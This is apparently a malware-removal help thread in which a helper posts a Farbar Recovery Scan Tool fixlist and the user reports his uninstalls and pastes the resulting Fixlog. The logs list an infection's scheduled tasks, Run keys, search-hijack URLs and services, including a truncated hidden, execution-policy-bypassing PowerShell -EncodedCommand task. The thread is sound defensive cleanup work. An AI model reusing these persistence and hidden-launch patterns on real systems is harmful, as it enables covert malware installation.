2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2016-12-27 12:51 - 2016-12-27 12:51 - 00010752 _____ C:\Users\Robert G\AppData\Local\fluctuations.exe
2016-12-21 06:43 - 2016-12-21 06:43 - 00046592 _____ C:\exervice.exe
2016-12-16 09:24 - 2016-12-16 09:24 - 01718968 _____ C:\WINDOWS\4b15ad0c9aba0f5f34b9d34c5ca543e0.exe
2016-12-16 09:18 - 2016-12-16 09:18 - 00095040 _____ (97V68D) C:\WINDOWS\system32\Drivers\979804fd5c15500d838ae68596384f64.sys
2014-12-01 12:43 - 2014-12-01 12:43 - 0000230 _____ () C:\Users\Robert G\AppData\Local\328ac946-536c-4e44-8483-c0f65d99bbad.dat
2014-12-01 12:43 - 2014-12-01 12:43 - 0000854 _____ () C:\Users\Robert G\AppData\Local\7396d5af-93b3-4d36-bfec-04bbd1449761.dat
2014-12-01 12:43 - 2014-12-01 12:43 - 0000230 _____ () C:\Users\Robert G\AppData\Local\9483d08e-1f72-4d13-b956-5e490aa0f581.dat
2014-12-01 12:43 - 2014-12-01 12:43 - 0000278 _____ () C:\Users\Robert G\AppData\Local\b62f5060-8250-438a-a930-35c70e952a02.dat
2016-12-27 12:51 - 2016-12-27 12:51 - 0010752 _____ () C:\Users\Robert G\AppData\Local\fluctuations.exe
2016-12-27 13:07 - 2016-12-27 13:10 - 0100352 _____ () C:\Users\Robert G\AppData\Local\slisdo.dll
2016-12-27 13:07 - 2016-12-27 13:10 - 0002560 _____ () C:\Users\Robert G\AppData\Local\uninstallro.exe
2016-12-27 13:36 - 2016-12-27 13:36 - 0439808 _____ () C:\ProgramData\smp2.exe
C:\Users\Robert G\AppData\Local\Temp\12C5.tmp.exe
C:\Users\Robert G\AppData\Local\Temp\9S1ETRV3OH.exe
C:\Users\Robert G\AppData\Local\Temp\B4E9.tmp.exe
C:\Users\Robert G\AppData\Local\Temp\ICReinstall_B4E9.tmp.exe
C:\Users\Robert G\AppData\Local\Temp\sdf6733.exe
C:\Users\Robert G\AppData\Local\Temp\W66KQ7BR7K.exe
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Citrix\GoToMeeting\1468\G2MOutlookAddin64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
Task: {0A6D162B-2271-438A-9015-FDF86E38E3A1} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {0B0C6F63-0BD1-498A-9527-397F7F32D262} - System32\Tasks\gak73699857k73699857 => C:\Program Files (x86)\knockdowns\knockdowns.exe [2016-12-27] (activate)
Task: {11643EA6-43A5-4B26-BCA2-B79C17E2627D} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== ATTENTION
Task: {136AC49D-1185-4DAF-9EED-4010A2D37876} - System32\Tasks\src_srv => C:\Users\Robert G\AppData\Roaming\src_srv\tsktst.exe [2016-12-26] ()
C:\Program Files (x86)\knockdowns
Task: {1990B26F-6ADF-4BD8-BA6F-799C43204F26} - System32\Tasks\18170115 => C:\Users\Robert G\AppData\Local\fluctuations.exe [2016-12-27] () <==== ATTENTION
Task: {1CCBFDDC-4FED-4859-9EA1-176E35894E0A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {1E7810AB-4461-4BAB-A923-725FF0121E8B} - System32\Tasks\73699857 => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [2016-12-27] () <==== ATTENTION
Task: {20A9A40C-98B8-4A9E-9EF4-34A0EB5D2C67} - System32\Tasks\Update Service for Youtube AdBlock => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe [2016-12-27] () <==== ATTENTION
Task: {335F0AFA-8CF9-409A-931C-B15A49778819} - System32\Tasks\Update Service for Youtube AdBlock2 => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe [2016-12-27] () <==== ATTENTION
Task: {4E463819-FB04-48C1-ACDA-F4F4D23C5466} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {52AE6531-40FD-4377-BFBD-D5FBC7CEFD1A} - System32\Tasks\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134 => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {5C8969CF-AF98-4F0F-A7DD-B1B9C5CC10B2} - System32\Tasks\System Healer Task => C:\Program Files (x86)\SystemHealer\RescueMonitor.exe [2016-12-26] () <==== ATTENTION
Task: {5D326864-1C1B-4B0C-98E4-8975183EBD11} - \WPD\SqmUpload_S-1-5-21-3079306625-983104223-3348847558-1001 -> No File <==== ATTENTION
Task: {69CE572E-9923-4159-A330-DB1D3C2631A8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {6EFA82CE-E47B-4B0A-AD1A-88DC8A5D6565} - System32\Tasks\60353394 => C:\Program Files (x86)\Ovals\fluctuations.exe [2016-12-27] () <==== ATTENTION
Task: {7115A4DA-439D-4050-9AEF-FD2E2E5A752E} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {7B8662A0-9355-4D8A-8BFD-BEAF35343CD1} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {7C02E7AF-D6DC-44AC-B6B1-3B4DDDE34DAF} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {85384654-A986-4FB7-A8DA-D7761EDA3149} - System32\Tasks\k73699857 => C:\Program Files (x86)\knockdowns\knockdowns.exe [2016-12-27] (activate)
Task: {965C4FE9-DA8F-4232-8D6F-D709676DEF24} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {99C8DB32-949A-499C-B5D9-6042D048950D} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {9FFCB734-D79F-4764-8B63-4F06330E3F45} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2016-12-26] () <==== ATTENTION
Task: {A06CEAA3-C663-4DD1-BE93-23D8A41E521F} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {A18C8BED-9923-4C65-B78D-B7C168B06955} - System32\Tasks\ga1817011518170115 => C:\Users\Robert G\AppData\Local\fluctuations.exe [2016-12-27] ()
Task: {A9528279-474A-4DBA-B459-B825FF0C055E} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== ATTENTION
Task: {AA44AE25-68B3-45C6-B7D1-06333F50237C} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2016-12-27] () <==== ATTENTION
Task: {AB85B611-7F3D-4A11-A7EA-5DAC9B9FCCEC} - System32\Tasks\AGProxyCheck => C:\Program [Argument = Files (x86)\AnonymizerGadget\AGService.exe /recove]
Task: {ADD99CD3-D8CD-40A8-935C-68C869A6BCB2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {B4B655B9-3E3B-42D6-8EF3-721B1CAC4B75} - System32\Tasks\ga7369985773699857 => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [2016-12-27] ()
Task: {B7270AB1-E0AB-41E2-971C-27831D9730D2} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2016-12-26] () <==== ATTENTION
Task: {C3BB1E32-5428-4562-8D07-A171B852CB9C} - System32\Tasks\{7D0C7D47-7A0E-7E79-0A11-087E790A110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwA7ADsAIAAgACAAOwAgADsAIAA7ADsAIAA7ACAAOwAgADsAIAAgACAAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcA (the data entry has 10148 more characters). <==== ATTENTION
Task: {FD468177-984E-4514-B2CE-7B86E83EF36F} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerPeriod.job => <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Update Service for Youtube AdBlock.job => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Update Service for Youtube AdBlock2.job => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe <==== ATTENTION
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epe&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,"
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk -> C:\program files (x86)\Google\Chrome\application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epe&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
C:\WINDOWS\TEMP\Jxwh7jTdDh8tytSaP
AlternateDataStreams: C:\ProgramData\Temp:972E3A44 [272]
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Classes\exefile: "%1" %* <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Classes\.exe: exefile => "%1" %* <===== ATTENTION
FirewallRules: [{0CFEF3A1-D62E-4242-BA17-47AFEC0E9CFE}] => C:\Program Files (x86)\Ovals\fluctuations.exe
FirewallRules: [{CE917A65-979C-4094-9A27-546C03A0F0B4}] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe
FirewallRules: [{70CB83FD-6AD0-4679-BD8F-A7D29BD02E90}]
FirewallRules: [{4ABBB1A8-3F3A-42F2-AFD1-8A812FD3A3E2}]
hosts:
emptytemp:
  • Right click on FRST.exe, select Run as administrator then press the Fix button
  • When completed he tool will create a log on the desktop called Fixlog.txt.  Please copy and paste the contents of the file in your reply.

===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:

  • Programs uninstall?
  • Fixlog
  • Update on computer performance

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#4 billiam864

billiam864
  • Topic Starter

  • Members
  • 71 posts
  • OFFLINE
  •  
  • Local time:10:48 PM

Posted 28 December 2016 - 11:24 AM

Hello, and Thank you!

 

I used Revo Uninstaller to eliminate the following as guided:

AnonymizerGadget

AnySend

BestCleaner version 1.0

Body Text Feathering

CleanBrowser

EZSearch

GeekBuddy

KNCTR

MyBeeSearchService

NowUSeeIt Player  (Were loads of Bold files in many different registries). 

One System Care 

ProxyGate version 3.0.0.1176

REOptimizer

Search module

shopperz

Social2Search
System Healer
Unfugitive Archhypocrite Asonia

Youtube AdBlock

 

 

I did not find listed the below:

BandwidthStat

Itibiti RTC

 

After then running the Fix shown below, my cpu is much improved. I appear to be able to use Chrome again normally without the random webpages or pop-ups, and no more other install attempts on screen. Previously I couldn't even access a website, and could barely get to the control panel, so this is much improved. I would say the speed is still a bit slower than previous, but tough to say for sure.

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 21-12-2016
Ran by Robert G (28-12-2016 10:10:50) Run:1
Running from G:\
Loaded Profiles: Robert G (Available Profiles: Robert G)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CreateRestorePoint:
CloseProcesses:
C:\Users\Robert G\AppData\Local\Temp\WS
C:\Users\Robert G\AppData\Roaming\src_srv
C:\Program Files\AE5AV44CD6
C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE
C:\Program Files (x86)\mem
C:\Program Files (x86)\BestCleaner
C:\Program Files\1OZOH9DOKF
C:\Program Files\0DA5GV0SMZ
C:\Program Files (x86)\Unfugitivepocson
C:\Program Files (x86)\Ovals
C:\Program Files (x86)\NowUSeeItPlayer
C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956\e06d61be9f5e5cd7184b5ecb5bf64007.exe
C:\Program Files\Common Files\Noobzo
C:\Program Files\Jidd
C:\Users\Robert G\AppData\Roaming\JucdiJhnoz
C:\Users\Robert G\AppData\Roaming\Xeeedxi
C:\Users\Robert G\AppData\Roaming\Interstatnogui
C:\Windows\Temp\nst9E9E.tmp
C:\Windows\Temp\set_xVQSGNGL.exe
C:\Windows\Temp\set_xVQSGNGL.exe
C:\Users\Robert G\AppData\Local\Temp\WS
C:\Program Files (x86)\Unfugitivepocson
HKLM\...\Run: [group] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKLM\...\Run: [groupgroup] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKLM-x32\...\Run: [AnonymizerGadget] => "C:\Users\Robert G\AppData\Roaming\AGData\bin$\AnonymizerLauncher.exe" /S /startup --ppapi-flash-path=./pepflashplayer.dll /source:1665 /subsource:200088693 <===== ATTENTION
C:\Users\Robert G\AppData\Roaming\AGData
HKLM-x32\...\Run: [src_srv] => C:\Users\Robert G\AppData\Roaming\src_srv\strttst.exe [16464 2016-12-26] ()
HKLM-x32\...\Run: [ayling] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKLM-x32\...\Run: [aylingayling] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKLM-x32\...\Run: [BestCleaner] => C:\Program Files (x86)\BestCleaner\BestCleaner.exe [180736 2016-09-16] () <===== ATTENTION
HKLM-x32\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [764144 2016-01-11] () <===== ATTENTION
HKLM\...\RunOnce: [OMEWPRODUCT_FD7I7] => C:\Program Files (x86)\BestCleaner\6URRPC.exe [411648 2016-12-27] (LFG655OZW) <===== ATTENTION
HKLM\...\RunOnce: [OMEWPRODUCT_4SCPB] => C:\Program Files (x86)\BestCleaner\RLLZNZ.exe [411648 2016-12-27] (LFG655OZW) <===== ATTENTION
HKLM\...\Policies\Explorer: [NoViewOnDrive] 0
HKLM\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKLM\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKLM\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKLM\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKLM\...\Policies\Explorer: [NoViewContextMenu] 0
HKLM\...\Policies\Explorer: [NoShellSearchButton] 0
HKLM\...\Policies\Explorer: [NoFind] 0
HKLM\...\Policies\Explorer: [NoFile] 0
HKLM\...\Policies\Explorer: [HideClock] 0
HKLM\...\Policies\Explorer: [NoTrayContextMenu] 0
HKLM\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKLM\...\Policies\Explorer: [NoSetFolders] 0
HKLM\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKLM\...\Policies\Explorer: [NoSetTaskbar] 0
HKLM\...\Policies\Explorer: [NoDeletePrinter] 0
HKLM\...\Policies\Explorer: [NoDFSTab] 0
HKLM\...\Policies\Explorer: [NoChangeStartMenu] 0
HKLM\...\Policies\Explorer: [NoLogoff] 0
HKLM\...\Policies\Explorer: [NoWindowsUpdate] 0
HKLM\...\Policies\Explorer: [NoEncryptOnMove] 0
HKLM\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKLM\...\Policies\Explorer: [NoResolveSearch] 0
HKLM\...\Policies\Explorer: [NoSaveSettings] 0
HKLM\...\Policies\Explorer: [NoHardwareTab] 0
HKLM\...\Policies\Explorer: [NoStartMenuSubFolders] 0
HKLM\...\Policies\Explorer: [NoDesktop] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [probabaly] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [probabalyprobabaly] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [formally] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [formallyformally] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [7E2GIGOFIW] => C:\Program Files\AE5AV44CD6\AE5AV44CD.exe [369152 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [kelling] => C:\Program Files (x86)\mem\kelling.exe [68835 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [const] => C:\Program Files (x86)\Ovals\fluctuations.exe [10752 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [ProxyGate] => C:\Users\Robert G\AppData\Roaming\ProxyGate\MainService.exe [1142880 2016-01-10] (Gold Click Ltd) <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [DP53A0YCAS] => C:\Program Files\1OZOH9DOKF\8RNAHD98E.exe [369152 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [slisdo] => rundll32.exe "C:\Users\Robert G\AppData\Local\slisdo.dll",slisdo <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [8SI36M2PFP] => C:\Program Files\0DA5GV0SMZ\0DA5GV0SM.exe [369152 2016-12-27] ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [YPCXU7XLWZ] => C:\Program Files (x86)\BestCleaner\ZES6LOELP3.exe [369152 2016-12-27] () <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [Q4M50GL1YU] => C:\Program Files (x86)\BestCleaner\A3TLSPE275.exe [369152 2016-12-27] () <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [764144 2016-01-11] () <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Run: [Interstatnogui] => C:\Users\Robert G\AppData\Roaming\Interstatnogui\interstatnogui.exe [2757568 2016-12-27] (Global surveys) <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [DisableCMD] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoFind] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoFile] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [HideClock] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\...\Policies\Explorer: [NoStartMenuSubFolders] 0
Startup: C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\misprision.lnk [2016-12-27]
ShortcutTarget: misprision.lnk -> C:\Program Files (x86)\Ovals\fluctuations.exe ()
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www-searching.com/?pid=s&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,&vp=ch&prd=set_ie
SearchScopes: HKU\S-1-5-21-3079306625-983104223-3348847558-1001 -> DefaultScope {CD01B6C4-A7DB-43CF-B6B5-9E5E0419DA91} URL =
SearchScopes: HKU\S-1-5-21-3079306625-983104223-3348847558-1001 -> {B2155548-F7E4-4313-ACE1-89C26E550F10} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
SearchScopes: HKU\S-1-5-21-3079306625-983104223-3348847558-1001 -> {CD01B6C4-A7DB-43CF-B6B5-9E5E0419DA91} URL =
BHO: Jidd -> {9211B66D-AA1B-4BD0-bF35-65E6C6E5F23F} -> C:\Program Files\Jidd\Rorfeql64.dll [2016-12-27] ()
BHO: No Name -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [No File]
CHR HomePage: Default -> hxxp://www-searching.com/?pid=s&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,&vp=ch&prd=set_ch
CHR StartupUrls: Default -> "hxxp://www-searching.com/?pid=s&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,&vp=ch&prd=set_ch"
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shyos&prd=set_ch&q={searchTerms}&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
R2 66d2d577efd779c3e9f6f6c2faf74956; C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956\e06d61be9f5e5cd7184b5ecb5bf64007.exe [5556736 2016-12-16] () [File not signed] <==== ATTENTION
R2 Cegoe; C:\Users\Robert G\AppData\Roaming\Xeeedxi\Xeeedxi.exe [170496 2016-12-04] () [File not signed]
R2 Ilaaugca; C:\Users\Robert G\AppData\Roaming\JucdiJhnoz\Rawei.exe [121344 2016-12-04] () [File not signed]
R2 KarxMhfonki; C:\Program Files\Jidd\KarxMhfonki.exe [1684992 2016-12-27] () [File not signed]
R2 srcsrv; C:\Users\Robert G\AppData\Roaming\src_srv\winsrcsrv.exe [13904 2016-12-26] ()
R2 UnfugitiveA; C:\Program Files (x86)\Unfugitivepocson\UnfugitiveA.exe [132096 2016-12-16] (Renascence Inc.) [File not signed]
R2 WindowService; C:\Users\Robert G\AppData\Local\Temp\WS\WindowService.exe [8192 2016-12-25] () [File not signed]
c:\exervice.exe
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
R2 meseboje; C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE\knsg851A.tmpfs [X]
